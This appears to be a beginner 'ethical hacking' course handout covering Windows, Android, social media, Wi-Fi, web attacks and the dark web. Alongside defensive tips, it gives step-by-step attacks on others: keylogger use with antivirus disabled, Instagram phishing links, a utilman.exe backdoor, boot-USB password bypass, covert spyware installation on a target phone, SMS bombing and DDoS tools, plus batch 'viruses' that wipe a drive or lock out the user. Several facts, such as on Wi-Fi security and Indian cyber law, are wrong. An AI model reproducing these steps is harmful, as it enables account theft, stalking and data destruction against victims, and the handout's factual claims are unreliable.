You are on page 1of 25

01 | INTRODUCTION

| What is Hacking ?
To access others DATA or SYSTEM without PERMISSION is called HACKING.

| What is Ethical Hacking ?


To access others DATA or SYSTEM with PERMISSION is called ETHICAL HACKING.

| Types of Hackers
There are THREE types of Hackers : BlackHat, WhiteHat, GreyHat
WhiteHat : Does only LEGAL things, known as Ethical Hacker
BlackHat : Does only ILLEGAL things
GreyHat : They sometimes does LEGAL and sometimes does ILLEGAL things.
Remember types of HACKERS are based on INTENTION of the HACKER.
Skills and Techniques are same with all of THREE.
Just USE of them and intention defines which type of HACKER he or she is.

| What is Operating System ?


It is a MEDIATOR between HUMANS and MACHINES.
It is a system software that RUNS hardware of computer system.
Example :
Windows, Linux, Android, Ios

| What is Software ?
Any digital thing that can make task easier is called SOFTWARE.

System Software :
The software that runs HARDWARE is called SYSTEM SOFTWARE.
Example : OS

Application Software :
Software that is made to do specific task is called APPLICATION SOFTWARE.

Utility Software :
Software that comes PREINSTALLED in OS, which we cannot UNINSTALL is called
UTILITY SOFTWARE.
| What is Hardware ?
Physical components of the COMPUTER is called Computer Hardware.

| Input Devices : Keyboard, Mouse, Scanner


Devices which is used to ENTER DATA inside computer is called INPUT DEVICES.

| Processing Devices : CPU and GPU


Device that is used to PROCESS the INPUT and prepare OUTPUT is called
Processing Device.
CPU : Central Processing Unit | It is Compulsory
GPU : Graphical Processing Unit | It is Optional.

| Output Devices : Monitor,Speaker, Printer


Device that is used to GIVE OUTPUT to the USER is called OUTPUT DEVICE.

| Storage Devices : RAM, ROM, HDD, SSD, USB Drive, External HDD
Device that is used to STORE DATA is called STORAGE DEVICE.

| What is Network ?
Group of Computers that SHARE data is called NETWORK.

| What is HUB, SWITCH and ROUTER ?


HUB : It is a dumb device, it SENDS data to all connected DEVICES.
SWITCH : It is a smart device, it SENDS data to ONLY one DEVICE.
ROUTER : It is a smart device, it also gives WIFI facility.

| What is Server ?
The Computer that provides a SPECIFIC SERVICE is called SERVER.

| What is Client ?
The computer that requests a SERVICE from the SERVER is called CLIENT.

| What is ISP ?
ISP = Internet Service Provider
Whose Internet you are using is called your ISP.
Example : Jio, Vodafone etc.
| IP Address : Local IP Address and Public IP Address
IP = Internet Protocol

Local IP : IP given by your ROUTER or PHONE is called LOCAL IP.


Starts with 192.168
Find Local IP ?
To find it :>
Win+R > cmd > Enter... Black Screen.
Open CMD, and type command : ipconfig [ 192.168.0.*]
in IPv4 : You will see IP Here
Default Gateway : you will see IP of ROUTER Here

Public IP : IP given by your ISP.


Find Public IP ?
Google.

| What is Submarine Cable ?


It is an OPTICAL FIBER Cables that created real INTERNET.
Site : www.submarinecablesmap.com

| How Real Internet Works ?


Using SUBMARINE CABLES.
02 | IDENTITY CHANGING
| Change IP Address : Proxy and VPN and BlackHat Way
Proxy :
It is a server that changes your IP Address to foreign
https://hidester.com/proxy

This site shows YOUR OS and BROWSER plus IP ADDRESS :


https://www.whatismybrowser.com/location

FIRST TECHNIQUE : Proxy > hidester.com/proxy


SECOND TECHNIQUE : Zenmate vpn for Firefox

THIRD TECHNIQUE : Gam nu vapro :)

Rules :
Never use wifi of your friends
Never use wifi of YOUR CLASS, SCHOOL or COLLAGE
Never use wifi of your NEIGHBOURS
Stay safe from CCTV

| MAC address Change


Tool : TMAC Technitium MAC Address Changer

| Change OS and Browser


Firefox Addon : User Agent Switcher for Firefox
03 | BASIC HACKING USING CMD

Finding Website IP Address


Ping SITENAME

| Finding Computer and Routers Local IP


ipconfig

| Finding Computer Name and Username


whoami

| Finding Users on the Target System


net user

| Change Admin Password without Knowing Current Password


net user USERNAME NEWPASS

| Find Saved WIFI Passwords from Target System


List : netsh wlan show profile
Find Pass : netsh wlan show profile name=”WIFINAME” key=clear
Pass :> Key Content : Here will be the PASSWORD for the WIFI
04 | SOCIAL MEDIA HACKING AND SECURITY
[ Facebook, Instagram, Email, WhatsApp ]

| What is Keylogger ?
Keylogger :
It is a software that captures every keystrokes on the computer.
So, If anybody logins to any account, their username and password will be saved
by this software, We can see it.

We are going to use : REVEALER KEYLOGGER.


It is the worlds best keylogger program for hackers.

NOTE :
Most of the hacking softwares are considred as VIRUS.
SO windows defender will PREVENT it.

Windows Defender :
It is a pre installed ANTI VIRUS of windows.
Turn off the WINDOWS DEFENDER.

Open Keylogger : CONT+ALT+F9 => Key to open LOG FILE


Fn = Function Button

| Using Saved Logins


Go to browser > BAR or DOT SIGNS > Password Link > Here will be saved Pass.

| Using OTP Stealing with Android Messages


Now OTP is not available.
But other SMS can be viewed with this APP.
Search ANDROID MESSAGES from your PHONE in PLAY STORE.
Install the app, change with default sms app and scan QR code of the MESSAGES
web.

| Using Phishing
Link for INSTA : cspsec.in/insta/
For Password : cspsec.in/insta/data.txt
| Security ?
 Never login from unknown devices
 Never give your device to anyone
 Set 2FA
 Never login from any link
 Never REMEMBER PASSWORD in Browsers
05 | WINDOWS HACKING AND SECURITY
| What is Password ?
Key that protects information is called PASSWORD.

| What is LM and NTLM ?


Both are ALGORITHMS to create HASHES of Windows Password.
LM = Lan Manager > Used in WINDOWS XP and Earlier
NTML = New Technology Lan Manager > Used after Windows XP to Till Date.

| What is Password Hashes ?


Encrypted version of the Password is called PASSWORD HASHES.

| What is SAM ?
SAM = Security Accounts Manager
This file in windows stores password hashes of the Windows OS.

| How to Bypass Windows Password ?


Requirement :
Rufus Tool / Windows Login Unlocker File / USB Drive

Process 01 | Ready our pen drive for HACKING PASSWORD


Plug your USB Drive
Open RUFUS tool
Click on SELECT button and select Windows Login Unlocker ISO file
Click on START
When process is FINISHED, Your USB Drive is READY !!!

Process 02 | Hacking Target Laptop or Desktop Password


Find LAPTOP or DESKTOP brand of target computer
Search in google : boot key for dell laptop [ replace dell with your laptop brand ]
Now, plug our USB DRIVE to target computer
Restart the system
When BLANK screen appears, hold the BOOT KEY until a blue menu shows on
screen
That blue menu is called BOOT MENU
Select USB Drive from BOOT MENU
Hit enter
Now a software will load, and shows a list of USERNAMES
Select your USERNAME and right click on IT
Select CHANGE PASSWORD, Remove password word and type your NEW PASS to
open this system.
Close the Software.
Remove USB Drive.
System will RESTART.
Hacked :)

| How to Set Backdoor in Windows ?


Click on START MENU
Type : advanced startup
Click on RESTART
Choose TROUBLESHOOT > ADVANCE OPTIONS > Command Prompt
Tpye the following commands :

c: [ Enter ]
cd windows/system32 [Enter]
ren utilman.exe util.exe [Enter]
copy cmd.exe utilman.exe [ Enter ]
exit

System will be restarted.


Now click on UTILMAN ;)
Your CMD will be opened.

Now type :
net user
It will show usernames, find the one you want to change the password !

Type the following command to CHANGE the pass :


net user USERNAME NEWPASS [ Enter ]
| Security ?
| Set BIOS Password
Find BIOS key for your laptop brand on GOOGLE.
Example : bios key for DELL [ Replace DELL with your laptop brand ]

Restart the SYSTEM


Hold the BIOS KEY
BIOS software will be shown on screen
Find SECURITY or PASSWORD option
Click SET PASSWORD
Exit
Done :)

Note : Never set this pass bcoz if you FORGET this, we cannot HACK it!!!

| Set BITLOCKER on System Drive


What is BITLOCKER ?
It is a WINDOWS ENCRYPTION SOFTWARE.
It is used to SET password on DRIVE of computer.
It comes preinstalled in Windows PRO version, if you have HOME version, it is not
AVAILABLE.

To check you have PRO or HOME version of Windows ?


Win + R > Type : winver
You will find your Windows Version using this command.
06 | WINDOWS SYSTEM MONITORING
| What is Employee Monitoring ?
The activity to monitor your EMPLOYEE is known as SYSTEM MONITORING.
We can monitor them without their knowledge.

| Why to Monitor Employee Activity ?


To find misuse of the system as well as for better performance of the Employees.

| Is it Legal to Monitor Your Employees Activities ?


Yes.

| Setup Monitoring on A Company Computers with Classroom Spy


Tool : Classroom Spy Pro
07 | ANDROID PHONE HACKING AND SECURITY

| What is Android ?
Android word means A ROBOT THAT looks like HUMAN.
It is an OPERATING SYSTEM for mobile phones.
Owner of the Android OS is GOOGLE.

| What is Spyware ?
Spyware = Spy + Software
Means a software that is used to SPY on PHONE or COMPUTER.
We will use a SPYWARE to hack targets phone.

| Why Android is Hackable ?


Android phone allows us to DOWNLOAD and INSTALL apps OUTSIDE the PLAY
STORE, So it is hackable.

| Why iOS is not Hackable ?


iOS is not hackable bcoz it doesnt allow apps OUTSIDE apps store.

| Lets Hack Your Own Phone ;)


TASK 01 | Hacking OUR OWN PHONE for SECURITY ')
Step 01 | Our Phone :>
Open this site : www.mobile-tracker-free.com

Click on REGISTER option


Give your GMAIL ID
Set your PASSWORD
Tick on AGREE
Click on CREATE ACCOUNT NOW !!!

Step 02 | Target Phone :>


Open CHROME browser
Open this site : cyberprotectors.info/m.apk
This will download APP FILE

File Manager
APK
m.apk > Open this file
Install
Three options Allow
Download app > WIFI > Open >
Allow ? : Yes
Child or Own : Select Any
Agree Next, Agree Next

Login
Settings to allow :) Allow
Activate
Accessibility Service > Go > Security Service : ON
Uninstall app
NEXT

Login
STEP 01 : ID and PASSWORD
Click on SAVE.

STEP 03 | Monitor target phone : Our Phone

mobile-tracker-free.com
Login

SMS, CALLS, LOCATION, CAMERA LIVE, PHOTO, SEND SMS


Download From File Manger
Voice Messages
Instant Messages
Ringing Or Vibrate Phone

PART 02 | How to DETECT my phone is hacked ?


Go to PHONE SETTINGS
Search for : Device Admin Apps or Device Administrators or Device Manager

PART 03 | How to be SAFE from HACKERS ?


Never give your phone to anyone ;)
Not even your CLOSE FRIENDS !!!
| SMS Bombing and Protection
Site : mytoolstown.com/smsbomber

| Anonymous Calling
App : IndyCall

| Finding Pictures of Contact Numbers in Our Contact list


App : EyeCon

| Security ?
 Don’t give your phone to anybody for even 2 minutes.
 Turn on Play Protect always.
 Don’t install apps from Unknown Sources about Hacking.
08 | VIRUS CREATION AND PREVENTION
| What is Virus ?
It is a computer program that damages your DATA or SYSTEM.
There are many type of virus like following :

| What is Trojan ?
It is a virus that controls or spy on remote computer.

| What is Ransomware ?
RansomeWare = Ransom + Software
It is a virus that locks all data on TARGET MOBILE or COMPUTER
To unlock the data, you have to PAY ransom to the HACKER who has created the
VIRUS.
Example : WannaCry and Petya

Practical Time : Creating Viruses

| System Crasher
This virus will CRASH any windows computer.

Lets create virus ?


Open notepad and copy past following code, save with .bat extension.

:nvirus
start notepad
start cmd
goto nvirus

Solution :
Restart system.

| Data Hider
This virus will HIDE all the data, which DRIVE letter you have written in Code.

Lets create virus ?


Open notepad and copy past following code, save with .bat extension.

attrib +H +R +S /S /D d:/*.*

Solution :
To unhide ?
Just replace + with -
And run the virus again :)

| Data Wiper
This virus will DELETE all the data in the DRIVE you have written in Cod .

Lets create virus ?


Open notepad and copy past following code, save with .bat extension.

del d:\*.| /s /q

| WinLocker
This virus will CHANGE PASSWORED and Log Out the User.

Lets create virus ?


Open notepad and copy past following code, save with .bat extension.

net user %username% pari


rundll32.exe user32.dll,LockWorkStation

| Creating EXE of VIRUS


Tool : BAT to EXE Convertor

| Security ?
 Turn On Windows Defender or Use Anti Virus Program
 Never open any unknown file
 Test any unknown file on VIRUSTOTAL.COM before executing
09 | WEB ATTACKS AND PREVENTION
| What is Website ?
Website is a collection of webpages about a specific company or business.

| What is Domain ?
Name of the website is called Domain.
Exp:
www.cyberprotectors.info

| What is Hosting ?
The space of server where all files of a website is stored is called Web Hosting.
Exp :
Go Daddy
Big Rock are companies who provide us space for our website.
They charge per year.

| What is Webserver ?
It is a server where websites are stored.

How it Works ?
| DOS Attack
DOS = Denial Of Service
It is a attack that sends lots of request to the website until site crashes.
In this attack only ONE COMPUTER does attack.

| DDOS Attack
DDOS = Distributed Denial of Service
It is an attack that sends lots of requests from multiple computers at once on a
website until site crashes.
In this attack MULTIPLE COMPUTERS are used for attack.

Tool : LOIC [ Low Orbit Ion Canon ]

| Security ?
 Using DDOS Protection Service
10 | DATA SECURITY
| Disable USB Ports on Your Laptop or Desktop
Tool : Windows USB Blocker

| Lock Your Keyboard and Mouse


Tool : KeyFreeze

| Hide Files and Folders


Tool : Our Virus

| Hide Drives
Tool : Disk Management [ diskmgmt.msc ]

Steps :
+ R > diskmgmt.msc
Click on drive you want to HIDE
Right click on it and select CHANGE DRIVE LETTER option
Click on REMOVE option
Click on OK OK
Done

Now your drive is HIDDEN !!


Check MY COMPUTER.

To UNHIDE the DRIVE ?


Repeat same process, but to get drive back ADD DRIVE letter.

| Protect Application using PassDoor


Tool : Password Door

| Block Website
Tool : Simple Website Blocker
| Data Backup Policy
Data should be at minimum THREE PLACES :
Your PHONE
Your COMPUTER
Cloud

| Data Recovery : Phone – Laptop – USB Drive – External HDD


Tool For Windows : RECUVA or R-STUDIO
App For Android : Disk Digger

| Steganography : Data Hiding Technique


Tool : Our Secret

| Turn on Windows Firewall


Command : firewall.cpl [ RUN MENU COMMAND ]

Steps :
Win+R
Type : firewall.cpl
Check it color is RED here, click on RECOMMENDED SETTINGS.
It will be GREEN.
Green means FIREWAL is ON.

| Turn on Windows Defender


Steps :
Click on Start Button
Type VIRUS and Threat Protection
Click on it
TURN REAL TIME PROTECTION ON
Done
11 | ONLINE BANKING TRANSACTION
 Always use your own Laptop or Phone for online banking transactions
 Never use Open WIFI.
 Never give your phone to anyone, they can install SPYWARE on your PHONE
 Never give your laptop to anyone they can install computer spyware on your
laptop or Desktop
 Don’t share your Account details with strangers on mail
 Remember to receive a payment you don’t need to enter your UPI PIN, Only
the time of payment you need to do it.
12| WIFI HACKING AND SECURITY
| Introduction to WIFI
WIFI = Wireless Fidelity
It is a wireless computer network.

| Wi-Fi Security : WEP, WPA and WPA2


WEP= Wired Equillant Privacy
Oldest wifi security, now it is OUTDATED.

WPA= Wifi Protected Access


Strongest wifi security
Latest version of WIFI Security is : WPA2 in INDIA, and WPA3 in out of india.

| Why Wifi Is Not Hackable ?


It uses WPA2 security which encrypts password that is why it cannot be
bruteforces easily.

| Finding Who is Connected to our WIFI on Android


Android App : Fing

| Finding Saved WIFI Passwords on Windows


Tool : WirelessKeyView

| Making WIFI Jammer using NODE MCU ESP8266


Microchip : NODE MCU ESP8266

| Find Routers IP and Access : Change WIFI Name and Password


ipconfig [ Find Default Gateway IP and type that into URL ]
Give ADMIN ADMIN username and password, if didn’t work give ADMIN BLANK.
Change SSID and PASSWORD of WIFI.

| Making WIFI Jammer using NODE MCU ESP8266


Find PDF.
13 | DEEP WEB : THE HIDDEN INTERNET
| Introduction
The internet that is INVISIBLE from the GOOGLE SEARCH is called DEEP WEB.

| What is Deep Web ?


Internet that can be accessed using TOR BROWSER, is called DEEP WEB.

| What is Dark Web ?


Illegal sites of the DEEP WEB is known as DARK WEB.

| What is TOR ?
TOR = The Onion Router
It is a NETWORK that can be used to ANONYMOUSLY do surfing and visiting
ANONYMOUS sites.
We need TOR BROWSER.

| History of TOR
CIA used TOR.
| How TOR Works ?
It uses THREE SERVERS to reach the TARGET WEBSITE, So our IP have multiple
layers of Protection.

| What is TOR Circuit ?


Group of THREE SERVERS given to us for connection in deep web is called TOR
CIRCUIT.
It changes every 5 Minutes.

| Deep Web Search Engine : Ahmia


ahmia.fi

| What is RED ROOM ?


It is a LIVE STEAMING OF TORCHURE ROOM.

| Hitmen Service
It is a site from which ONE CAN HIRE… HITMEN.
| Drugs
It is a site from which ONE CAN Buy … DRUGS.

| Weapons
| Bitcoin : Payment Method of TOR

| Precautions to Use While Surfing Deep Web


Never give any personal info.
Always cover your camera.
14 | CYBER CRIME AND CYBER LAW

| What is Cyber Crime ?


Any crime that is done using COMPUTER, MOBILE and INTERNET is called CYBER
CRIME.

| What is Cyber Law ?


Law to Punish CYBER CRIME is called CYBER LAW.

| History of Cyber Law in India


It was made for a SECRET SERVICE called CIA America.
CIA = Central Intelligence Agency.

| Some Important Cyber Law to Remember


Find PDF of LAW.
15 | TEST 

You might also like